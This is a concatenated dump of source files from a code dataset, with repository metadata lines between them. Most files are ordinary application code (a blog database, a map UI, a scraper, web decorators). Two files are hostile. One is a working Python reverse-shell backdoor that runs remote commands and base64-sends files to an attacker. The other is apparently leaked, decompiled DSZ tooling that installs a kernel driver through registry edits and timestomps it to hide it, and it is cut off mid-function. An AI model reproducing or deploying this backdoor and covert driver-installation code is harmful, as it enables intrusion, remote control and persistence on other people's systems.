if same_slug != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"insert into blog_contents \
values (Null,?,?,?,?,?,?,?,?,?,?,?,?,?)",
(title, slug, created, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original))
con.commit()
con.close()
return 'ok'
except:
return 'no'
def update_contents(pid, title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title_id = TContents().check_title_id(title,pid)
same_slug_id = TContents().check_slug_id(slug,pid)
if same_title_id != 'ok':
return "same Title!"
if same_slug_id != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"update blog_contents set \
title = ?, \
slug = ?, \
modified = ?, \
tags = ?, \
column = ?, \
text = ?, \
short = ?, \
allow_top = ?, \
allow_comment = ?, \
allow_feed = ?, \
status = ?, \
original=? where id = ?",
(title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original, pid)
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
def DelPost(pid):
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"delete from blog_contents where id =?", (pid, )
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
|
mit
| 5,526,406,091,569,730,000
| 30.192661
| 76
| 0.573235
| false
| 3.687636
| false
| false
| false
|
IntegerMan/Pi-MFD
|
PiMFD/Applications/Navigation/MapLocations.py
|
1
|
9253
|
# coding=utf-8
"""
This file contains map locations information
"""
from PiMFD.Applications.MFDPage import MFDPage
from PiMFD.UI.Button import MFDButton
from PiMFD.UI.TextBoxes import TextBox
from PiMFD.UI.Widgets.MenuItem import TextMenuItem
__author__ = 'Matt Eland'
class MapLocation(object):
"""
Represents a location on the map
:param name: The name of the location
:type name: basestring
:param lat: The latitude
:type lat: float
:param lng: The longitude
:type lng: float
"""
name = None
lat = None
lng = None
tags = {}
id = None
def __init__(self, name, lat, lng):
super(MapLocation, self).__init__()
self.name = name
self.lat = lat
self.lng = lng
class MapLocationAddPage(MFDPage):
id = None
def __init__(self, controller, application, back_page):
super(MapLocationAddPage, self).__init__(controller, application)
self.btn_back = MFDButton("BACK")
self.btn_add_location = MFDButton("ADD")
self.back_page = back_page
self.lbl_header = self.get_header_label('Add Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.data_provider = application.data_provider
self.set_focus(self.txt_name)
def set_values_from_context(self, context):
if context:
self.txt_lat.text = str(context.lat)
self.txt_lng.text = str(context.lng)
self.txt_name.text = context.get_display_name()
self.id = context.id
def get_lower_buttons(self):
return [self.btn_back, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Add
# Actually add the thing
location = MapLocation(self.txt_name.text, self.txt_lat.text, self.txt_lng.text)
location.id = self.id
self.data_provider.add_location(location)
self.application.select_page(self.back_page)
return True
return super(MapLocationAddPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_add_location.enabled = True
else:
self.btn_add_location.enabled = False
return super(MapLocationAddPage, self).arrange()
def render(self):
return super(MapLocationAddPage, self).render()
class MapLocationDetailsPage(MFDPage):
def __init__(self, controller, application, location, back_page):
super(MapLocationDetailsPage, self).__init__(controller, application)
self.location = location
self.btn_back = MFDButton("BACK")
self.btn_save = MFDButton("SAVE")
self.btn_home = MFDButton("HOME")
self.btn_delete = MFDButton("DEL")
self.back_page = back_page
self.lbl_header = self.get_header_label('Edit Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300, text=location.name)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180, text=location.lat)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180, text=location.lng)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.set_focus(self.txt_name)
def get_lower_buttons(self):
return [self.btn_back, self.btn_save, self.btn_home, None, self.btn_delete]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Save
# Actually add the thing
self.location.name = self.txt_name.text
self.location.lat = self.txt_lat.text
self.location.lng = self.txt_lng.text
self.application.data_provider.save_locations()
self.application.select_page(self.back_page)
return True
elif index == 2: # Home
# Set this as home
self.controller.options.lat = float(self.txt_lat.text)
self.controller.options.lng = float(self.txt_lng.text)
return True
elif index == 4: # Delete
# TODO: Once my UI framework has grown a bit more, add a confirm functionality.
self.application.delete_location(self.location)
self.application.select_page(self.back_page)
return True
return super(MapLocationDetailsPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_save.enabled = True
else:
self.btn_save.enabled = False
# Mark as home if it's your home location
try:
if float(self.txt_lat.text) == self.controller.options.lat and \
float(self.txt_lng.text) == self.controller.options.lng:
self.btn_home.selected = True
else:
self.btn_home.selected = False
except:
self.btn_home.selected = False
return super(MapLocationDetailsPage, self).arrange()
def render(self):
return super(MapLocationDetailsPage, self).render()
class MapLocationsPage(MFDPage):
"""
Lists map locations the user has saved
:param controller: The controller
:param application: The navigation application
:param map_context: The map context
"""
def __init__(self, controller, application, map_context, back_page):
super(MapLocationsPage, self).__init__(controller, application)
self.map_context = map_context
self.data_provider = application.data_provider
self.btn_back = MFDButton("BACK")
self.btn_edit_location = MFDButton("EDIT")
self.btn_add_location = MFDButton("NEW")
self.back_page = back_page
def handle_selected(self):
is_first = True
self.clear_focusables()
if self.data_provider.locations and len(self.data_provider.locations) > 0:
self.panel.children = [self.get_header_label('Locations ({})'.format(len(self.data_provider.locations)))]
for l in self.data_provider.locations:
item = TextMenuItem(self.display, self, '{}: {}, {}'.format(l.name, l.lat, l.lng))
item.font = self.display.fonts.list
item.data_context = l
self.panel.children.append(item)
if is_first:
self.set_focus(item)
is_first = False
super(MapLocationsPage, self).handle_selected()
def handle_control_state_changed(self, widget):
location = widget.data_context
if location:
self.application.show_map(location.lat, location.lng)
super(MapLocationsPage, self).handle_control_state_changed(widget)
def get_lower_buttons(self):
return [self.btn_back, self.btn_edit_location, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Edit
if self.focus:
loc = self.focus.data_context
if loc:
self.application.select_page(MapLocationDetailsPage(self.controller, self.application, loc, self))
return True
elif index == 2: # Add
self.application.select_page(MapLocationAddPage(self.controller, self.application, self))
return True
return super(MapLocationsPage, self).handle_lower_button(index)
def get_button_text(self):
return "GOTO"
def arrange(self):
return super(MapLocationsPage, self).arrange()
def render(self):
if not self.data_provider.locations or len(self.data_provider.locations) < 0:
self.center_text("NO LOCATIONS DEFINED")
else:
return super(MapLocationsPage, self).render()
|
gpl-2.0
| -5,634,889,265,219,760,000
| 31.584507
| 118
| 0.608451
| false
| 3.795324
| false
| false
| false
|
Superjom/bad_source
|
python/paper/spider/spider/spiders/amazon_notebook.py
|
1
|
2872
|
# -*- coding: utf-8 -*-
from __future__ import division
import sys
sys.path.append('../../')
import re
import time
import random
import urlparse as up
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.exceptions import CloseSpider
from scrapy.http.request import Request
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from spider.items import SpiderItem
'''
Created on Jul 30, 2013
@author: Chunwei Yan @ pkusz
@mail: yanchunwei@outlook.com
'''
#base_url = r'http://www.amazon.com/*'
root = "/home/chunwei/bad_source/python/paper/spider/spider/spiders"
allowed_url = r'http://www.amazon.com/s/.*keywords=notebook.*'
content_url_format = '//h3[contains(@class,"newaps")]/a[contains(@href,"amazon.com")]/@href'
init_start_urls = [
"http://www.amazon.com/s/ref=sr_nr_n_11?rh=n%3A565108%2Ck%3Anotebook&keywords=notebook&ie=UTF8&qid=1384484919&rnid=2941120011"
]
init_allowed_domains = [
"amazon.com",
]
MAX_SLEEP_TIME = 20
class SpiderSpider(CrawlSpider):
count = 0
name = "amazon_notebook"
allowed_domains = init_allowed_domains
dic = set()
start_urls = init_start_urls
rules = (
#only extract links here
#Rule(SgmlLinkExtractor(allow=allowed_url)),
#extract content here and parse urls
Rule(SgmlLinkExtractor(allow=allowed_url), callback="parse"),
)
@property
def sleep_time(self):
return random.random() * MAX_SLEEP_TIME
def parse(self, response):
'''
extract
title
content
url
'''
print '>'*50
print 'response url: ', response.url
hxs = HtmlXPathSelector(response)
print '>>>> repsonse.url: ', response.url
#get urls
content_urls = hxs.select(content_url_format).extract()
list_urls = hxs.select('//span[contains(@class,"pagnLink")]/a[contains(@href,"keywords=notebook")]/@href').extract()
list_urls = [ up.urljoin(response.url, url) for url in list_urls]
print "@" * 60
time.sleep(self.sleep_time)
self.start_urls.extend(list_urls)
for url in list_urls:
yield Request(url, self.parse)
content_re = re.compile(r'http://www.amazon.com/[^s]+.*&keywords=notebook$')
for url in content_urls:
if content_re.match(url):
if len(self.dic) > 450:
self.start_urls = []
raise CloseSpider('reach pages limit, end the spider.')
self.count += 1
self.dic.add( hash(url))
#extract data
item = SpiderItem()
item['url'] = url
item['kind'] = 'amazon_notebook'
yield item
if __name__ == "__main__":
pass
|
gpl-2.0
| 4,343,573,823,116,785,700
| 26.883495
| 134
| 0.614206
| false
| 3.493917
| false
| false
| false
|
freezeeedos/revshelly
|
python_reverse_shell.py
|
1
|
3523
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Quentin Gibert
# All rights reserved.
# Based on the work of:
# David Kennedy: http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/
# Xavier Garcia: www.shellguardians.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import subprocess
import sys
import os
import time
import shlex
import base64
import re
HOST = '127.0.0.1' # The remote host
PORT = 8080 # The same port as used by the server
def connect((host, port)):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
return s
def wait_for_command(s):
s.send("[" + os.getcwd() + "]>")
data = s.recv(1024)
data_arr = shlex.split(data, posix=False)
if data == "quit\n":
s.close()
# the socket died
elif len(data)==0:
return True
elif (len(data_arr) > 1) and (data_arr[0] == "uu"):
for i in range(1, len(data_arr)):
try:
f = open(re.sub(r'''"''', '', data_arr[1]), 'rb')
pass
except IOError, e:
s.send("=> " + str(e) + "\n")
continue
try:
fdata = file.read(f)
f.close()
filename = re.sub('''"''', '', os.path.basename(data_arr[i]))
s.send("BEGIN: " + filename + "\n")
s.send(base64.encodestring(fdata))
s.send("END: " + filename + "\n")
except Exception, e:
s.send("Unable to read " + filename + ": " + str(e) + "\n")
return False
elif (len(data_arr) > 1) and (data_arr[0] == "cd"):
try:
os.chdir(re.sub(r'''"''', '', data_arr[1]))
except Exception, cde:
s.send(str(cde) + "\n")
return False
else:
# do shell command
proc = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
return False
def main():
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error:
pass
time.sleep(5)
if __name__ == "__main__":
sys.exit(main())
|
mit
| -661,312,054,476,301,800
| 32.552381
| 98
| 0.598354
| false
| 3.658359
| false
| false
| false
|
WoLpH/EventGhost
|
eg/Classes/PluginItem.py
|
1
|
6391
|
# -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
import base64
import pickle
import wx
# Local imports
import eg
from ActionItem import ActionItem
from TreeItem import TreeItem
class PluginItem(ActionItem):
xmlTag = "Plugin"
icon = eg.Icons.PLUGIN_ICON
isRenameable = False
info = None
@eg.AssertInActionThread
def __init__(self, parent, node):
TreeItem.__init__(self, parent, node)
if node.text:
try:
args = pickle.loads(base64.b64decode(node.text))
except AttributeError:
args = ()
else:
args = ()
evalName = node.attrib.get('identifier', None)
self.pluginName = node.attrib.get('file', None)
guid = node.attrib.get('guid', self.pluginName)
self.info = info = eg.pluginManager.OpenPlugin(
guid,
evalName,
args,
self,
)
self.name = eg.text.General.pluginLabel % info.label
if info.icon != self.icon:
self.icon = eg.Icons.PluginSubIcon(info.icon)
#self.icon = info.icon
self.url = info.url
self.executable = info.instance
def AskCut(self):
return self.AskDelete()
def AskDelete(self):
actionItemCls = self.document.ActionItem
def SearchFunc(obj):
if obj.__class__ == actionItemCls:
if obj.executable and obj.executable.plugin == self.executable:
return True
return None
if self.root.Traverse(SearchFunc) is not None:
eg.MessageBox(
eg.text.General.deletePlugin,
eg.APP_NAME,
wx.NO_DEFAULT | wx.OK | wx.ICON_EXCLAMATION
)
return False
if not TreeItem.AskDelete(self):
return False
return True
@eg.AssertInActionThread
def Delete(self):
info = self.info
def DoIt():
info.Close()
info.instance.OnDelete()
info.RemovePluginInstance()
eg.actionThread.Call(DoIt)
ActionItem.Delete(self)
self.executable = None
self.info = None
@eg.AssertInActionThread
def Execute(self):
if not self.isEnabled:
return None, None
if eg.config.logActions:
self.Print(self.name)
if self.shouldSelectOnExecute:
wx.CallAfter(self.Select)
eg.indent += 1
self.info.Start()
eg.indent -= 1
eg.result = self.executable
return None, None
# The Find function calls this from MainThread, so we can't restrict this
# to the ActionThread
#@eg.AssertInActionThread
def GetArguments(self):
return self.info.args
def GetBasePath(self):
"""
Returns the filesystem path, where additional files (like pictures)
should be found.
Overrides ActionItem.GetBasePath()
"""
return self.info.path
def GetData(self):
attr, text = TreeItem.GetData(self)
del attr[0]
attr.append(('Identifier', self.executable.info.evalName))
guid = self.executable.info.guid
if guid:
attr.append(('Guid', guid))
attr.append(('File', self.pluginName))
text = base64.b64encode(pickle.dumps(self.info.args, 2))
return attr, text
def GetLabel(self):
return self.name
def GetTypeName(self):
return self.executable.info.name
def NeedsStartupConfiguration(self):
"""
Returns True if the item wants to be configured after creation.
Overrides ActionItem.NeedsStartupConfiguration()
"""
# if the Configure method of the executable is overriden, we assume
# the item wants to be configured after creation
return (
self.executable.Configure.im_func !=
eg.PluginBase.Configure.im_func
)
def RefreshAllVisibleActions(self):
"""
Calls Refresh() for all currently visible actions of this plugin.
"""
actionItemCls = self.document.ActionItem
plugin = self.info.instance
def Traverse(item):
if item.__class__ == actionItemCls:
if item.executable.plugin == plugin:
pass
#eg.Notify("NodeChanged", item)
else:
if item.childs and item in item.document.expandedNodes:
for child in item.childs:
Traverse(child)
Traverse(self.root)
@eg.LogIt
def RestoreState(self):
if self.isEnabled:
eg.actionThread.Call(self.info.Start)
@eg.LogIt
@eg.AssertInActionThread
def SetArguments(self, args):
info = self.info
if not info.lastException and args == self.info.args:
return
self.info.args = args
label = info.instance.GetLabel(*args)
if label != info.label:
info.label = label
self.name = eg.text.General.pluginLabel % label
#eg.Notify("NodeChanged", self)
self.RefreshAllVisibleActions()
if self.isEnabled:
eg.actionThread.Call(self.info.Stop)
eg.actionThread.Call(self.info.Start)
def SetAttributes(self, tree, itemId):
if self.info.lastException or self.info.initFailed:
tree.SetItemTextColour(itemId, eg.colour.pluginError)
@eg.AssertInActionThread
def SetEnable(self, flag=True):
ActionItem.SetEnable(self, flag)
if flag:
self.info.Start()
else:
self.info.Stop()
|
gpl-2.0
| -8,394,167,896,932,475,000
| 30.019417
| 79
| 0.6
| false
| 4.190164
| true
| false
| false
|
FabriceSalvaire/Musica
|
Musica/Geometry/Path.py
|
1
|
2215
|
####################################################################################################
#
# Musica - A Music Theory Package for Python
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
from .Primitive import Primitive2D
from .Vector import Vector2D
####################################################################################################
class Polyline(Primitive2D):
#######################################
def __init__(self, *args):
""" Construct a :class:`Polyline` along points. """
if len(args) == 1:
self._points = [Vector2D(point) for point in args[0]]
else:
self._points = [Vector2D(point) for point in args]
##############################################
def clone(self):
return self.__class__(self._points)
##############################################
def __repr__(self):
return "{0.__class__.__name__} {0._points}".format(self)
##############################################
def transform(self, transformation):
points = transformation * self._points
return self.__class__(points)
##############################################
def __iter__(self):
return iter(self._points)
def __len__(self):
return len(self._points)
def __getitem__(self, _slice):
return self._points[_slice]
|
gpl-3.0
| 6,031,306,140,311,497,000
| 31.101449
| 100
| 0.463657
| false
| 5.139211
| false
| false
| false
|
ikargis/horizon_fod
|
horizon/decorators.py
|
1
|
3388
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
General-purpose decorators for use with Horizon.
"""
import functools
from django.utils.decorators import available_attrs # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
def _current_component(view_func, dashboard=None, panel=None):
"""Sets the currently-active dashboard and/or panel on the request."""
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if dashboard:
request.horizon['dashboard'] = dashboard
if panel:
request.horizon['panel'] = panel
return view_func(request, *args, **kwargs)
return dec
def require_auth(view_func):
"""Performs user authentication check.
Similar to Django's `login_required` decorator, except that this throws
:exc:`~horizon.exceptions.NotAuthenticated` exception if the user is not
signed-in.
"""
from horizon.exceptions import NotAuthenticated # noqa
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
return view_func(request, *args, **kwargs)
raise NotAuthenticated(_("Please log in to continue."))
return dec
def require_perms(view_func, required):
"""Enforces permission-based access controls.
:param list required: A tuple of permission names, all of which the request
user must possess in order access the decorated view.
Example usage::
from horizon.decorators import require_perms
@require_perms(['foo.admin', 'foo.member'])
def my_view(request):
...
Raises a :exc:`~horizon.exceptions.NotAuthorized` exception if the
requirements are not met.
"""
from horizon.exceptions import NotAuthorized # noqa
# We only need to check each permission once for a view, so we'll use a set
current_perms = getattr(view_func, '_required_perms', set([]))
view_func._required_perms = current_perms | set(required)
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
if request.user.has_perms(view_func._required_perms):
return view_func(request, *args, **kwargs)
raise NotAuthorized(_("You are not authorized to access %s")
% request.path)
# If we don't have any permissions, just return the original view.
if required:
return dec
else:
return view_func
|
apache-2.0
| -4,795,479,006,821,248,000
| 35.042553
| 79
| 0.679752
| false
| 4.21393
| false
| false
| false
|
quiltdata/quilt
|
api/python/quilt3/registry.py
|
1
|
1604
|
"""
Microservice that provides temporary user credentials to the catalog
"""
from datetime import timedelta
import boto3
import requests
from botocore.exceptions import ClientError
from flask import Flask
from flask_cors import CORS
from flask_json import as_json
app = Flask(__name__) # pylint: disable=invalid-name
app.config['JSON_USE_ENCODE_METHODS'] = True
app.config['JSON_ADD_STATUS'] = False
sts_client = boto3.client( # pylint: disable=invalid-name
'sts',
)
class ApiException(Exception):
"""
Base class for API exceptions.
"""
def __init__(self, status_code, message):
super().__init__()
self.status_code = status_code
self.message = message
CORS(app, resources={"/api/*": {"origins": "*", "max_age": timedelta(days=1)}})
@app.route('/api/buckets', methods=['GET'])
@as_json
def list_buckets():
"""
Returns an empty list for compatibility
"""
return dict(
buckets=[]
)
@app.route('/api/auth/get_credentials', methods=['GET'])
@as_json
def get_credentials():
"""
Obtains credentials corresponding to your role.
Returns a JSON object with three keys:
AccessKeyId(string): access key ID
SecretKey(string): secret key
SessionToken(string): session token
"""
try:
creds = sts_client.get_session_token()
except ClientError as ex:
print(ex)
raise ApiException(requests.codes.server_error,
"Failed to get credentials for your AWS Account.")
return creds['Credentials']
if __name__ == '__main__':
app.run()
|
apache-2.0
| -7,490,552,160,810,158,000
| 22.588235
| 79
| 0.642768
| false
| 3.912195
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/windows/driver/__init__.py
|
1
|
11721
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import dsz
import dsz.file
import dsz.path
import dsz.version
def Install(project, driverName, localDriverName, startValue, typeValue, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if _isDriverSigningEnabled():
dsz.ui.Echo('* Cannot install because driver signing is enabled', dsz.ERROR)
return False
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to install the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if dsz.cmd.Run('registryquery -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
dsz.ui.Echo('%s (%s.sys) is already installed (key exists)' % (project, driverName), dsz.ERROR)
return False
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo('%s (%s.sys) is already installed (file exists)' % (project, driverName), dsz.ERROR)
return False
dsz.ui.Echo('Uploading the SYS')
if dsz.cmd.Run('put "%s" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (localDriverName, systemroot, driverName, project)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo('Matching file time for %s.sys' % driverName)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemroot
else:
matchFile = '%s\\user.exe' % systemroot
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (but continuing anyway)', dsz.WARNING)
keysAdded = True
dsz.ui.Echo('Adding registry keys')
if not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value ErrorControl -type REG_DWORD -data 0' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Start -type REG_DWORD -data %u' % (driverName, startValue)):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Type -type REG_DWORD -data %u' % (driverName, typeValue)):
keysAdded = False
if keysAdded:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
return True
def Load(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Loading %s' % driverName)
if dsz.cmd.Run('drivers -load %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def Uninstall(project, driverName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
rtn = True
if len(driverName) == 0:
dsz.ui.Echo('Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to uninstall the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if not Unload(driverName):
rtn = False
dsz.ui.Echo('Removing registry key')
if dsz.cmd.Run('registrydelete -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -recursive' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Removing %s.sys' % driverName)
if dsz.cmd.Run('delete -file "%s\\drivers\\%s.sys"' % (systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
return rtn
def Unload(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Unloading %s' % driverName)
if dsz.cmd.Run('drivers -unload %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def VerifyInstall(driverName, startValue, typeValue):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
rtn = True
dsz.ui.Echo('Checking for %s.sys' % driverName)
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
keyLoc = 'SYSTEM\\CurrentControlSet\\Services\\%s' % driverName
dsz.ui.Echo('Checking for key')
if dsz.cmd.Run('registryquery -hive L -key %s' % keyLoc):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/ErrorControl')
if dsz.cmd.Run('registryquery -hive L -key %s -value ErrorControl' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == 0:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Start')
if dsz.cmd.Run('registryquery -hive L -key %s -value Start' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == startValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
